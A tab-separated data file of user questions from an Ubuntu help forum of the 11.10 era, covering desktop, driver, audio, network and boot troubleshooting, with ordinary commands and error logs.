75800	how do i permanently disable extensions in gnome shell ?	i installed a gnome shell plugin that disables the menu bar , and places it on the top panel . i disabled and deleted the plugin files , but now i ca n't see the menu bar . i tried 'sudo apt-get purge gnome-shell ' , followed by 'sudo apt-get install gnome-shell ' , but it did n't seem to work . how can i place the menu bar back on the frame ? thanks .
75806	cheap pc specs run ubuntu 11.10 64-bit ?	would the below pc specs run ubuntu 11.10 64-bit at optimal performance ? asrock motherboard h61m-s , h61 , lga1155 , 2xddr3 slot , pcie x16 gbl vga dvi uatx intel celeron g530 lga1155 cpu 2.4ghz 2mb cache dual core 2c/2t hd graphics 8gb 4096gb ddr3 1333 memory single hynix / pqi / strontium a-ram / evm / team a-grade 60gb ocz vertex plus + ssd 185/90 2.5 '' ocz-ssd2-1vtxpl60g solid state drive hdd sata2 **this is a cheap upgrade of an old box , 22 '' monitor , keyborad , mouse , etc . no graphics card , just graphics ( modern ) on itel chip [ unity 2d will be available as a fallback if a computer does not support 3d acceleration.. ] ubuntu versions are changing every six months and pc parts are too - so this would be update advice ... . although you may say - it just works ( ubuntu ) on an old p3 with 500mb ram .
75807	chromium webbrowser freezes when start ( error : nss_util.cc ( 397 ) )	for some reason , while i was browsing the chrome web store ( and about 9 other tabs ) , the browser got frozen ( the window got darker , meaning it was processing ) . i also had just put my google-password in the preferences to sync everything on chrome . i have an intel i3 , and i never had problems with performance , so i think it 's not a hardware issue . i started it in incognito mode , on the terminal , but it still get frozen after about 3 seconds . the output was : $ chromium-browser -- incognito [ 3:3:848113656 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 6:6:848139429 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 7:7:848160628 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 11:11:848165760 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 10:10:848165760 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 18:18:848206961 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 24:24:848354909 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 26:26:848385315 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 30:30:848413750 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied [ 34:34:848414414 : error : nss_util.cc ( 397 ) ] error initializing nss without a persistent database : libsoftokn3.so : can not open shared object file : permission denied i 'm on firefox now . [ update : i 'm on chrome now . the problem is only with chromium ] any idea what 's wrong here ?
75811	unable to remove pidgin software completely	i 'm getting an error on the task bar each time i turn on my phone and used to ask me to check for updates . here is the message on the task bar : the update information is updated.this maybe caused by a network error or by a repository that is no longer available . please update manually by clicking on this icon and then selecting 'check for updates ' and check if some of the listed repository fail . but when i do this it says no updates available . i opened package manager and pressed the reload button and got this message box : w : gpg error : http : //in.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com oneiric release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key w : gpg error : http : //archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found w : some index files failed to download . they have been ignored , or old ones used instead . i saw the pidgin repositories creating issues in this message ( reloading the package manager gives a gpg error ) and removed the pidgin ppa from my software sources , but each time i restart it it shows the two pidgin ppa and the software as well . can anyone tell me how to remove it completely ?
75814	no visual effects with intel hd 3000 on ubuntu 11.10 , no compiz , no ubuntu-tweak etc	i have just come back to pcs after about a decade of avoiding windows the apple way.i have a sony vaio z series which has one of the sandybridge i5 processors which includes the hd3000 graphics . i decided to remove windows and stick ubuntu on it , after a bit of a struggle getting everything to work , all seems to be good except that i can not get any of the visual effects to do anything . with compiz , i have the option to change various settings but altering them makes no difference , similarly ubuntu-tweak does nothing . i am using gnome as opposed to unity ( which i think looks terrible ! ) but have also tried gnome shell and using gnome-tweak in that environment i was able to make a few basic changes to things like positions of window buttons etc but nothing more than that . i typed this into terminal : /usr/lib/nux/unity_support_test -p everything came back with a 'yes ' next to it , including unity 3d support . any help with enabling effects would be very much appreciated , thank you - oh , and go easy on me , i 'm new to this !
75816	uck resume existing project	i was making a custom live cd and ubuntu customization kit quit mid way ... is there a way i can use the current modified files i used ? please help me
75817	fan not recognized on an hp nc6400	i 'm using ubuntu 11.10 and an hp nc6400 laptop , and it does n't recognize my fans , which means that my laptop keeps overheating , is there anyway to make it recognize them ? thanks in advance : )
75820	headless ubuntu does n't boot - after installing sata drive	my ubuntu server does n't boot when i connect sata drive , once i disconnect it it boots fine . ( i 'm booting from usb drive ) what i did : i installed sata drive , booted normally , with fdisk created partition , formated to ext4 and rebooted . after reboot it does n't start . any ideas ? i have no monitor to see why it 's stoping or if there is any error msg . i 'm afraid it 's bios that tries to boot from sata drive instead of usb ...
75828	external microphone not working	gnome-volume-control does not recognise external hardware . my headphones work nonetheless , but an external microphone does not . external microphones used to work , but at times were temperamental - i would have to login or logout with or without microphone plugged in . i am running ubuntu 10.04 lts ( lucid lynx ) on an msi u100 wind notebook with one intel soundcard and trying to use a jack microphone which has worked previously . usb microphones have also been problematic . i have done the basics : installed upgrades . checked nothing is muted . looked for the device on gnome-volume-control . tried using a different microphone that works on a friends computer . tested my microphone works when using a different computer . checked my soundcard can be seen ( cat /proc/asound/cards ) . i have done more complicated things : i have tried playing around with settings in alsamixer . nothing is muted . i can adjust `` mic '' and `` internal mic '' regardless of whether an external microphone is plugged in . i have the choice of input source from `` mic '' , `` front mic '' , `` line '' and `` cd '' . i 've played around changing this and it has n't helped . i only have one capture option . in gnome-sound-recorder i have the choice of line , microphone 1 and microphone 2 . i have played around changing this option . none of these pick up sound from the external microphone . microphone 2 is the microphone on my laptop which is bad quality . in gnome-sound-recorder i have the choice of different profiles , and changing this has not helped either . i have looked at gstreamer-properties but none of that seemed helpful . i do n't know if there a way to check if these external devices are being picked up . i would like to make an external microphone work . please help !
75830	laptop touchpad triggering 3-finger gestures randomly	i did a fresh install of 11.10 shortly after it was released . my laptop 's touchpad ( a synaptics touchpad i believe , laptop is an asus g53sw ) had been acting strangely from the beginning . after receiving an answer to this question , i decided to look for other multi-touch gestures , and came across this page in the ubuntu wiki . it turns out all of the weird behavior i had observed ( windows getting moved , maximized/restored , or grab handles appearing ) corresponds to 3-finger gestures . whenever any of these behaviors occur , my touchpad will generally stop responding to 1-finger movements ( tapping for clicks or dragging to move the cursor ) until i click one of the two mouse buttons below the pad , which further reinforces my suspicion that the touchpad is somehow sending out 3-finger gestures at random when i use it . i decided to try all the gestures out myself to see how the touchpad responds . the only gestures i can get to work consistently are : two-finger drag ( scrolling ) and three-finger tap ( grab handles ) . three-finger dragging ( move window ) works fine half the time , the other half the window jumps around a lot as i drag it . i also ran into this question while researching the subject . i decided to run geistest to see if my touchpad supported 4 finger gestures in the first place . these were the results : http : //pastebin.com/znnnxsa9 so it 's clear my touchpad is n't working perfectly . so here 's the pertinent questions : is there any way to fix this erratic behavior ? i 'm guessing no , so ... is there any way to disable the 3-finger gestures specifically ? according to this question , probably not , so ... how can i disable multi-touch altogether ? how would i re-enable it if i change my mind ? edit : installed gnome shell , having no problems with the touchpad . at this point i 'm dead sure the problem is with unity 's 3-finger gestures . i 'd still like a solution to the issue , as i 'm quite partial to unity .
75831	using an external monitor on an lg r590 laptop	i just installed ubuntu 10.04 on my lg r590 laptop , and when i boot it , i ca n't get my external monitor to work . system- > preferences- > monitors wo n't recognize it ( even when i click detect monitors ) , and when i press fn+f7 - which is my laptop 's function key for switching between built-in/external displays - it does nothing . i found in the internet this article , which says i need to edit my xorg.conf file for this to work , and says that file should be created automatically when i install ubuntu . however , i ca n't find it in my /etc/x11/ , and this answer says that ubuntu does n't need that file anymore so it does n't create it - though it still uses it if it finds one . it also says that if i have an nvidia card ( which i have ) i can force ubuntu to create it by using sudo nvidia-xconfig , but i get a command not found when i try it . so , is there any other way to make ubuntu recognize my external screen ? or any way to force ubuntu to create a xorg.conf file so i can edit it according to that tutorial ? btw , i do n't know if it matters , but i connect my external monitor via hdmi-dvi cable ( hdmi side goes in my laptop , dvi side goes the monitor )
75833	alt-tab behaviour , windows from	i am wondering about the behaviour of the alt-tab : all windows are shown , whereas before ( sure on 10.10 , ca n't remember on 11.04 ) we could just see the windows of the current workspace . therefore the number of windows displayed is much more important ! could you please help me ?
75837	after suspend-resume , dmesg printk times look as if suspend happened exactly before resume ? !	please help me understand this quirk : sudo pm-suspend , wait 5 minutes , wake up the machine , dmesg : ... [ 817.724316 ] pm : entering mem sleep ... [ 820.380646 ] acpi : waking up from system sleep state s3 the printk seconds are obviously wrong ! i 've waited much more than 4 seconds between suspending and resuming ... what gives ? ( used ocelot 11.10 , kernel is 3.0.0-12-generic )
75842	media streaming server	i 'm looking for a media stream server ( specially audio streams ) for installing on my ubuntu server box . is there any lightweight , easy configurable solution ? it 's awesome if this solution is able to install on a high bandwidth server and gets a stream from a low bandwidth server and serves it for many clients . ( simply because the original server has n't enough bw to serve media for many clients ) ( my server is a lamp server , but i 'm looking for a good solution for one of my clients to stream his audio for one hour every week )
75843	how to clear ubuntu notifications ?	is there a way to clear the pop up notifications i get from changing the volume , brightness , dropbox updates , etc ... ? sometimes i have to sit and wait for them to go away so that i can continue to work , as they are blocking something i want to click or look at . i know this question might seem a little naggy but it does indeed lower my productivity sometimes . i do n't mind getting the notificatoins , i do mind not having a option to clear them . any idea how i can do that ? thanks . p.s . i am using ubuntu 11.10 ( gnome )
75851	keyboard backlight sensor does n't work on a sony vaio vpcs116fg	i have a vaio laptop ( vpcs116fg , s series ) . its keyboard has sensors that can detect how bright the surrounding is , so it automatically turns on the backlight in dark places such as airplane cabins . since i 've moved to ubuntu from windows 7 , the backlight sensor does n't work at all . by googling the issue , i found this website and followed the instructions , but at the compilation step , i was met with the following errors : sa/file_funcs.c : in function ‘get_first_backlight_device_name’ : sa/file_funcs.c:44:9 : warning : format ‘ % li’ expects argument of type ‘long int’ , but argument 2 has type ‘unsigned int’ [ -wformat ] /tmp/ccihkx5v.o : in function `handle_acpi_events ' : acpi_funcs.c : ( .text+0xf8 ) : undefined reference to `log' acpi_funcs.c : ( .text+0x109 ) : undefined reference to `log' acpi_funcs.c : ( .text+0x120 ) : undefined reference to `pow' collect2 : ld returned 1 exit status how do i make it work ?
75852	how do i see which ports are open ?	i am running a web server on a machine with ubuntu 11 . everything is accessible from the local network , but not from outside . what can i do to check to make sure the appropriate ports are open ? i am relatively new to ubuntu and server management , so any `` dumbing down '' is just fine . appreciate any help . google search has n't given me much actionable advice .
75853	asus eee pc r011px ( unity ) 3d support ?	i want to know if there is any chance to get unity 3d working wit my netbook ? . i tried the x-swat ( ubuntu-x ) ppa but when i log in to the workspace the sidebar ant the bar on the top are not visible . the netbook has a intel gma 3150 integrated graphic chip and a intel atom 570 as cpu . hope somebody can help me . cya
75858	i want my grub2 background to be black but setting it to black is not enough	the default background color for grub2 in ubuntu11.10 is a dark-magenta-purple . how to change this color to black so that i do n't have a purple splash on boot . ( i want to keep everything black and hidden ) . the background color is already set to black : gksudo gedit /etc/grub.d/05_debian_theme color_normal= '' white/black '' this is called the 'normal background ' color in grub . the word 'black' in this position means 'transparent ' to grub2 reference : http : //members.iinet.net/~herman546/p20/grub2 % 20splashimages.html # splashimage_font_colors
75859	is there any ereader-like program ?	i would like to have an ereader-like program to read books that i downloaded off of this website : http : //wilbor.lib.overdrive.com/e19f991b-7681-48e1-9cc2-618e1a8c7616/10/509/en/default.htm how do i do this if there is a way ?
75860	usb camera /dev/video0 and tv card /dev/video1 are mixing	sometimes when i start the system my web camera is set on /dev/video0 , and sometimes it 's on /dev/video1 and the tvtuner is on /dev/video0 . i 'd like to set it consistently , that one device is always on /dev/video0 and other /dev/video1 , not that they interchange if i disconnect the usb or randomly on system start .
75861	ups recommendations for a desktop computer	my question is related to ups compatibility with ubuntu server , but might be different . i am currently running the desktop version of ubuntu 11.10 on my desktop computer . i run it continuously as i use it for most of my studies , and also as use as an alarm clock in addition to my backup . my floor in our university dorm this year seems to have been having a problem with brief power outages , which i do n't believe is good for my hard drives ( besides being annoying ) . as such , i 'm finally considering getting a ups . my requirements are nothing fancy : i just need something that is easy to set up and will last just long enough for me to do a proper shutdown in the event of a power outage , or continue running as normal if the outage only lasts a minute or two . in my case , i 'd consider cheaper to be better . the question i mentioned earlier had an accepted answer recommending the apc brand for a server setup . is this what i should look for in my case , or would there be something more appropriate ? at any rate , i 'll probably be getting one from my parents when they shop this weekend from a brick-and-mortar micro center store , so it 'd be great if i had some recommendations to give them before they go out and a clueless/commissioned sales associate tells them what to buy for a windows machine .
75871	d-link dwl-g510 rt61 card not recognized	i need help here . i just install ubuntu desktop 11.10 and ca n't get my wireless card work . it is based on ralink chipset . i 've found a link pointing to a driver : http : //suporte.dlink.com.br/suporte/index.php . but it seems that this driver does n't include data for a kernel 3.x compilation , only 2.4 and 2.6 : ( can somebody help me ? edited : after have removed and reinstalled the card into the machine , ubuntu starts to recognize the card as a ralink at least . but rt61pci default driver did n't work . the network get the status of unclaimed : *-network unclaimed description : network controller product : rt2561/rt61 rev b 802.11g vendor : ralink corp. physical id : 2 bus info : pci @ 0000:03:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : latency=32 resources : memory : d0500000-d0507fff so after have tried dozen of times to build the linux driver from dlink support site , i gave up and have tried with ndiswrapper . i discover that i need to use a 64bit driver and the only one that worked was the xp64 that i found here . now its getting better because i can see more things with iwconfig : wlan0 ieee 802.11g essid : '' dlink '' mode : managed frequency:2.437 ghz access point : not-associated bit rate:54 mb/s tx-power:20 dbm sensitivity=-121 dbm rts thr=2347 b fragment thr=2346 b power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 but i still ca n't connect to ap : ( lspci -nnk : 03:02.0 network controller [ 0280 ] : ralink corp. rt2561/rt61 rev b 802.11g [ 1814:0302 ] subsystem : d-link system inc airplus g dwl-g510 wireless network adapter ( rev.c ) [ 1186:3c09 ] kernel driver in use : ndiswrapper kernel modules : rt61pci rfkill list all : returns nothing . sudo lshw -class network : *-network description : wireless interface product : rt2561/rt61 rev b 802.11g vendor : ralink corp. physical id : 2 bus info : pci @ 0000:03:02.0 logical name : wlan0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ndiswrapper+netrt61g driverversion=1.56+d-link,06/12/2009 , 1.02.08. latency=32 link=no multicast=yes wireless=ieee 802.11g resources : irq:21 memory : d0500000-d0507fff
75872	where are the networkmanager logs ?	a previous poster on the regular forums ( http : //ubuntuforums.org/showthread.php ? t=843991 ) said /var/log/daemon.log , but i do n't seem to have such a file . do i need to enable logging ?
75874	why does everything take so long to open ?	every time i click to open a program or anything , it takes at least 6 seconds to open . bigger programs take even longer . i right clicked on the desktop and selected `` change desktop background '' and the thing took like 10 seconds to open . any reason for this ?
75875	how do i re-add rhythmbox to the sound menu ?	a strange think happened in rhythmbox , after a crash , rhythmbox does n't shows anymore in the sound menu . if i switch to a guess session , it is ok . i tried to reinstall , but it did n't solve . ubuntu 11.10 .
75877	how do i bridge my wireless to my wired connection ?	i want to bridge the wireless connection with the wired connection . the wireless is the host and the wired is the client , so to speak . internet sharing ( inet < -- > wifi < -- > ethernet ) i tried to bridge my ethernet connection by going to network manager > edit connections wired > edit ipv4 settings > shared to other computers screenshots however , it seems to automatically disconnect half a second after it says `` connection established '' ! edit 2 got the network manager logs , it seems the address is in use . see http : //pastebin.com/djqrshxw , line 45. nm-tool output is here : http : //pastebin.com/x5aci5v1 . i tried firestarter , as mentioned in another thread , and no luck . i do n't have time to bother with a dozen command line tricks , unless is copy & pasting a shell script ... so please suggest ways that use guis and/or wo n't leave my computer in a confused state ( e.g . disabling network manager , manually connecting to a wpa network , installing brutils , etc. ) . edit : one idea that would work , if it 's possible -- is there a way to share connections via ssh and socks5 ? i 'd need to do this at a system-wide level though ; i only know how to do it through the browser now . then , i could run ifconfig eth0 192.168.4.1 on the computer sharing the inet , and ifconfig eth0 192.168.4.2 on the computer i 'm trying to share with ; i know this does work for host-to-host transfers . edit 3 if i run sudo killall dnsmasq , then nothing is using the 10.42.43.1 address the network manager sharing wants to use . but now it just takes longer to die , with error `` networkmanager [ 5935 ] : dnsmasq died with signal 9 '' [ http : //pastebin.com/4fntpugi ] . looking at just the commands [ http : //pastebin.com/1vrtqewk ] , maybe it 's trying to route eth0 to itself ? i 'm not that familiar with networking things though .
75879	could not find kernel image casper vmlinuz while doing installation	trying to install ubuntu-11.10-server-i386 on my desktop for which i downloaded universal-usb-installer-1.8.6.8 and followed the step as described on ubuntu website . i am using a pen drive to install it on my machine.when i started system it showed me following options run ubuntu from pen drive install ubuntu i when tried to installed it on my desktop nothing happened and the installation option menu keep coming on some more checking i found out that it showing following error could not find kernel image casper vmlinuz after doing goggling i came across the following post could not find kernel image ] 1 but cross verification showed that everything is fine in files installed on pen drive.i even checked the md5 check-sum of downloaded iso image and that is correct . can any one help me to find what exactly is going wrong in the process
75881	partition flash drive ?	i want to partition a usb flash drive so that two gigabytes is reserved for ubuntu and persistence , and the other two is for my files . i used gparted to create two fat32 partitions on the flash drive . natulius show the two partitions , good . however , when i open the starup disk creator , it shows the flash drive as one drive instead of two partitions . i am using ubuntu 11.10 and a 4gb flash drive . any help would be greatly appreciated .
75883	no sound from microsoft lifechat lx-3000 headphones	i have the following problem : in kde i can not hear any sound from the headphones ( microsoft lifechat lx-3000 ) . when i open the audio setup all sound devices are correctly recognized and by pressing the test button i correctly have sound from all of them . but when i change the master channel to the headphones and try to listen to a song or watch a movie i still have sound only from the speakers . this is very annoying and does not happen in gnome , so i assume it has something to do with the kde sound handling and not the alsa . any ideas are welcome . ps . switching to gnome is not a solution ... : )
75884	how to use a kde screensaver in gnome ?	really like kde clock screensaver , but it does n't even show in gnome . and a way to get it to work or similar alternatives ?
75885	livecd does not work on my desktop	i 've installed new version of ubuntu on my laptop without any issue using the livecd . but on my desktop , weird things happen : during the 1st try booting with the livecd on my desktop , my 2 year old child just hit the keyboard , and after several error messages the desktop loaded and i 've been able to test oneiric . but i wanted to redo a boot before installing oneiric to avoid mistakes . so during the 2nd time i tried to boot with the livecd , i could n't access to the point where i can choose to test or install . before trying a 3rd time , i 've `` cleaned the system '' from system parameter > system . but after that i 'm still not able to access to the point where i can choose to test or install . now it stops all the time on a black screen . i do not understand why several boot attempts with same cd have several results . so i wonder if the state of my current installation can affect re-booting with my livecd ?
75886	how do i set the computer to suspend when battery is critically low ?	i accidentally clicked on the option `` when power is critically low '' under system settings > power . the original entry was blank , but the only two options after i clicked were hibernate and shutdown . i want to set it back to suspend .
75887	how do i add a canon pixma mx860 network printer ?	i am running ubuntu oneiric 11.10 on two computers , one is amd-64bit architecture , the other i386 -- same problem on both . in 11.04 i could print and scan just fine , after some tinkering , but after a fresh install of 11.10 , adding ppa : michael-gruz/canon , and installing cnijfilter-mx860series and scangearmp-common from the ppa , ubuntu 's system-config-printer can not detect my network printer . in the previous installation it appeared as cnijnet : //printers-mac-address . i know it should be able to see it because i can ping the printer at its ip address , i can browse the printer 's web admin page from the computer , and my windows guest in virtualbox on the computer has no problem detecting and installing it . it seems like this problem is new to oneiric . how i can find my network pixma again ?
75888	what is apt-check and why does it run during boot ?	so during one of the sessions at uds-p , i discovered this cool ( and useful ) program called bootchart . after installing it and then running it , i analyzed it and compared it some of the results here . there is a program running during boot called `` apt-check , '' for somewhere in the ballpark of 40 seconds and it 's using a lot of cpu . which makes me ask these 2 questions : what is apt-check ? why does it run during boot ? i am running the on a single-core atom processor ( n270 ) , dual-boot machine running ubuntu 11.10 and windows xp home .
75889	headphone/speaker mixup after upgrading to 11.10 with a realtek alc892	it seems quite a few people have trouble with their speakers/headphones after upgrading tu ubuntu 10.10 , but my problem is slightly different . i have a desktop pc with a realtek alc892 . i have no speakers connected to the computer , but occasionally plug headphones into the front jack . when i do this , the field `` connector '' in the sound settings dialog switches from `` analog speakers '' to `` analog headphones '' , but then i hear no sound at all through the headphones . only when i manually switch said field back to `` analog speakers '' can i hear something . the funny thing : if i plug in the headphones and try to fiddle with the controls in alsamixer ( which means trying out setting different levels for different devices ) nothing happens . the only way to get sound on my headphones is to always manually switch the `` connector '' to `` analog speakers '' in the dialog box . i did not have these troubles in ubuntu 11.04 . any suggestions ?
75890	change folder permission	what permission should i apply to a folder so that everyone can see the hierarchy and all the files inside but they should not be able to read and write them . the folder can have multiple other folders with files inside .
75891	convert images to doc\rtf	my cv is written in latex using moderncv , and i have a script that converts it to pdf whenever i need to send an updated copy . however , some employers require microsoft word ( or rtf ) cv . i have converted the pdf into images , and manually pasted them into a doc file . is there a way to convert a series of pictures into a .doc file , each in a separate page ?
75895	how to forbid a specific package to be installed ?	can i configure ubuntu to never install a specific package even if it is required by another package i install ?
75896	how to make xfce default for logging into ubuntu other than unity	i want to use xfce every time i use ubuntu , but instead i have to log out and log back in choosing xfce each time i want to use it . how do i tell ubuntu to choose xfce instead of unity by default ?
75899	can openoffice calc read web services to populate fields ?	i have created a web service that provides me with sales data from our corporate erp system . we are going to use this to drive some `` dashboards '' showing this data graphically . for testing/ evaluation i would like to use a web service like a custom function to populate individual fields in a spreadsheet . i ca n't see how to d this easily in ms excel ( 2007 ) but wonders if openoffice calc has a capability . my hope/expectation is that i type in a call the web service in each cell and e web service reply ( a sales number relating to the web service call is returned and displayed in the cell . my web service is called something like this : http : //server:8080/saleshistory ? year=2011 & month=10 & region=europe & channel=web as you can guess , this will return the value of sales for october'11 for the region/sales channel stated .
75903	how do i put the top panel on an external monitor in gnome3 ?	in gnome 3 , i would like to put the top panel on my external monitor in ubuntu 11.10 . how do i do this ?
75904	how do i move grub to sata drive from usb flash ? and make new grub boot ubuntu server from usb ?	i have a weird situation at hand . i 've no ext monitor for my server . i was loading ubuntu server from usb flash drive , till i decided to add some real hdd . after adding hdd ( sata ) server does n't boot . because new drive has no grub installed and since it 's higher priority than usb drive , bios tries to load os from there and fails . now , i see only 1 solution ( except buying a new vga monitor ) . hook up hdd and usb to my laptop . boot from live cd , install grub to hdd and configur it to load os from usb flash . is this possible ? please help , any tutorial will be appreciated .
75909	can not login after fresh install , how to debug ?	today , after a fresh install , i ca n't seem to login with my user account . the guest account allows me to login , but not my usual account ( the one set during install ) . my account name was used in the past with older installs of ubuntu . i also have a /home dir that is partitioned . do i need to delete some settings in the /home or somewhere ? here are my partitions used : does anyone see anything wrong with these ? not sure about he / and /boot . /dev/sda1 ext4 1gb /boot /dev/sda5 swap 8gb swap /dev/sda6 ext4 20gb / /dev/sda7 ext4 20gb /usr /dev/sda8 ext4 20gb /var /dev/sda9 ext4 20gb /srv /dev/sda10 ext4 181gb /home ( existing - not formatted ) edit : i noticed it accepts the username/password , but i then see a black screen - then back to the login prompt . could there be an old nvidia setting in there that is causing the screen to go black ? in a previous install i did have nvidia issues - i gave up on that one . maybe i should try to load the drivers and put the nvidia card back in ?
75916	why is it so difficult to setup ruby on rails on ubuntu ?	i 've spent a few hours this morning trying to setup rails on a fresh instance of ubuntu and i noticed that the process is incredibly more convoluted than on windows . on windows i go to rubyinstaller.org , run the executable ( i was specifically interested in 1.9.2-p180 ) and then adjust the system path accordingly . rails also requires no additional steps , i can clone a git repository and start cranking away . on ubuntu i had to install the rvm ( which i could have done for windows as well ) , install the prereqs that is listed , have the apt-get fail because a bunch of those packages were no longer available . i then finally ran rvm install only to find out that make was n't going to work , so i had to manually comment out a bunch of dependencies on openssl from one of the .c files and rebuild it , then it finally installed . rails was still far from done though , so i had to install another bunch of prerequisites , edit some extra file in the ruby source and execute it , and then i could finally get rails console to even start . is this pretty normal ? should i pretty much expect everything to take a couple of extra hours on ubuntu if i 'm going to be developing rails applications ? i had to consult at least 3-4 guides for 11.04 and at least 5 different stack overflow posts to get the thing running , it seems like a very traumatic user experience to me .
75917	kile and monitor problem	i never unpdated my ubuntu 8 until now that i have a new laptop . i am very impressed with how much easier and better 11.10 has become ! my main use of computer is latex and here are list of some problems i am having : kile does not work properly with ubuntu 11.10 ! i can not move the menue tabs anywhere . i used to have them on the right side in a vertical manner , they now do not move and this is bugging me to have them on the top . i also used the following command sudo apt-get remove appmenu-gtk3 appmenu-gtk appmenu-qt to get rid of all on top menu , it worked i think with other applications but with kile some of the tabs such as `` settings '' stopped working . i am also having trouble with connecting into monitor with vga connector ! it does work with the other connector which i do not know the name of it . i have not tried usb connector yet . thanks in advance for help
75923	no dual screens on an asus m4a89 gtd pro	i 'm having an issue getting dual monitors working for kubuntu 11.10 . i have asus m4a89 gtd pro/usb3 mother board with integrated ati hd4290 graphics chip . when i try to enable multiple monitors through the system settings , it says `` this module is only for configuring systems with a single desktop spread across multiple monitors . you do not appear to have this configuration . '' i had previously attempted to fix this problem with another installation of ubuntu 11.10 , but ended up having to reinstall ubuntu because i messed up the software center dependencies . after i installed ubuntu the first time , a notification showed up asking me to install an ati graphics driver . i installed this driver , then restarted , and dual monitors did not work . that was when i went to the ati site and attempted to install the fglrx driver . when i tried to run the shell script for the fglrx driver , it said i had a previous version of an fglrx driver installed , and needed to remove it in order to install the new one . so i looked up some tutorial on how to remove it and found some apt-get remove command , which i ran . then i was able to install the new driver . dual monitors still did not work , and i could n't use the software center any more because it was corrupted and was unable to repair itself . so i just reinstalled ubuntu , and now i 'm trying to go about this the correct way . does anyone have this same configuration and which driver works for you ?
75928	adding physical volumes to lvm partitions - what happens to existing files ? and general ssd optimization	i 've got two drives in my laptop , a 120gb ssd and a 320gb hard drive . ubuntu ( 11.04 amd64 ) is on the hard drive , set up using lvm . now , i got this ssd recently , and i want to put ubuntu on it for faster boot times and such . what exactly happens if , say , i create a new physical volume on the ssd , and add new physical extents to my existing logical volumes ( say , / and /home ) ? will files be moved over to the ssd at all ? is there striping that goes on ? the goal is for my sytem to be faster , so i want to make sure that important files are on the ssd but it would be nice if i could avoid reinstalling completely . i 'm still not that comfortable with lvm . i actually tried doing a fresh install to my ssd but for some reason it failed in the middle of installing software packages ( after i set up the new physical volume and stuff for the ssd ) . in general , how do people run ubuntu on systems with a hard drive and an ssd , for best preformance ? thanks ! edit : i should mention that 80gb of the ssd is allocated to windows ( for games ) so ubuntu only has about 35gb ( random system reserved things and mistruths in advertising make up the last bit ) .
75929	how can i stop gnome 3 from asking my wireless password multiple times ?	when i login to my account the system ask me for my wifi password in a prompt that looks like the main ubuntu screen and later again with the gnome 3 look and maybe 2 or 3 more times , sometimes the third time it connects and some it dont . i 'm lost .
75932	is there an easy way to get a single folder out of a deja-dup backup ?	when i installed 11.10 , i manually moved my data . unfortunately , i forgot to move ~/.shotwell . i have a recent deja-dup backup of my home directory ( minus a few things like ~/.thumbnails and so on ) . is there an easy way to get the .shotwell folder from it ? i 'd rather not uncompress a 70 gb backup . thanks !
75935	hp pavilion dv5 does n't remember brightness settings across reboots	my problem is with ubuntu 11.10 in my notebook hp pavilion dv5 with a graphic intel ( r ) hd graphics . when i start ubuntu my screen is without brightness , i can increase it with my control buttons , but when i restart i do n't have brightness again .
75936	why does ubuntu 11.10 freeze when playing video ?	i run ubuntu 11.10 on i5 cpu with 4gb ram nvdia geforce gts 250 connected to widescreen tv ( hdmi ) when using vlc , xbmc or boxee to play movies the system randomly freeze , the audio is looping the last words of the video file and nothing is responding . so i have to manually reset the system . can anybody help ? p.s . i forgot to mention the the log file was full of line regarding xbox 360 wireless receiver ( i dual boot with windwos 7 ) so i unplugged it to see if that counts
75941	how to install microsoft silverlight plugin ?	when i install it normally it says itĺ not compatible with firefox 7.. how to fix this i need silverlight plugin for certain things ?
75942	how to add windows partition to unity home icon launcer ?	i already seen examples for adding favorite places on home icon launcher for documents , music , pictures , downloads and already added it . now i want to have also add windows partition so that when i click it will mount and open in nautilus . i did n't find any example for this anwhere . is it possible or not , if yes then how ?
75946	leapfrog crammer wo n't mount as a usb flash drive	i ca n't seem to get the leapfrog crammer study and sound system to show up as a flash drive under ubuntu so i can transfer stuff to it . i do n't want to install the leapfrog bloatware , can someone help me with this ? additional information : when i plug my crammer into my computer it shows a 1 mb file system with a link to download the crammer software . i want to know how to access the rest of the crammer 's file system so i can transfer music to it . the crammer does not show any other partitions in natulius . according to an article on the internet , the crammed is divided into three partitions : one with a link to install the crammer software , one with all content ( music , flash cards , etc . ) and one for firmware . i want to know how to access the one with the content so i can add music to the player . can anyone help me with this ? thanks in advance .
75949	how to tell if ubuntu is installed inside or alongside windows ?	i installed ubuntu 10.04 on a computer with windows on it ( and later upgraded to 11.04 and 11.10 ) . now i ca n't remember whether ubuntu was installed inside windows ( wubi ) or in its own partition . how can i find out which is the case ?
